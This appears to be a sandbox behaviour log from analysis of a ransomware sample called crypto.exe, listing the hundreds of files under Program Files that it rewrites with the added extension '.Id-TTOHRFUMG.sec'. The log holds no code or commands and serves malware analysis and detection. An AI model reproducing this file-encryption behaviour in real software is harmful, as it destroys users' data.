File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18191_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\psfont.properties.ja.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198102.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Black Tie.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Warsaw.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SplashScreen.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\VPREVIEW.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\1px.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\New_Salem.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME39.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BIZCARD.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\TWRECS.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_imem_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\TOC98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Metlakatla.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\STUBBY2.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsPrintTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\LogoCanary.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105388.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01040_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239941.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03014_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Jakarta.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02957_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL020.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01179_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00687_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cordoba.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Mawson.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WORDREP.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_left.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\atl.dll	crypto.exe
File created	C:\Program Files\7-Zip\Lang\io.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB4.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_glass.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_realrtsp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292286.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hardware Tracker.fdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\GRDEN_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Ceuta.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Santa_Isabel.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CHECKER.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\calendar.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\pt-BR.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Tell_City.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\LogoBeta.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\ext\jaccess.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\libvod_rtsp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\WatchFormat.wmf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\EMAILMOD.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libnormvol_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\NAVBARV.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00172_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107042.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152430.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\7-zip32.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\release.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187647.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\menu_arrow.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libftp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02845G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART15.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\JUNGLE.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Contacts.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285444.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185806.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Mail\wabimp.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-11.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00965_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00916_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\POSTCD98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_sun.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_uk.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Krasnoyarsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00985_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14996_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\OUTLVBA.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libsdp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105846.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115864.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ONINTL.DLL.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGZIPC.XML.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0280468.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\BlackTieMergeLetter.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jabswitch.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_hov.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\1036\MSGR3FR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Bogota.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Composite.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_disabled.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\St_Johns.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\currency.data.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART7.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\mozavcodec.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\library.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01186_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02201_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\QUERIES\MSN MoneyCentral Investor Stock Quotes.iqy.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\glass.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00560_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Istanbul.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01245_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14677_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\msvcr100.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\GrooveFormsMetaData.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\d3dcompiler_47.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185834.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Opulent.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0186002.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\bg_sidebar.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\Darwin.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\osclientcerts.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\v8_context_snapshot.bin.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_scene.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00238_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPreviewTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02055_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ACTIP10.HLP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WINWORD.DEV_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\AccessibleMarshal.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libimem_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeUpdater.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Marengo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\javaw.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\ext\meta-index.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-locale-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\kaa.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188519.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14532_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14870_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CERT.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\plugin-container.exe.sig.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Caracas.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Lagos.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01954_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GRAPH.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR42F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\LOOKUP.DAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-shadow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR8F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libtcp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
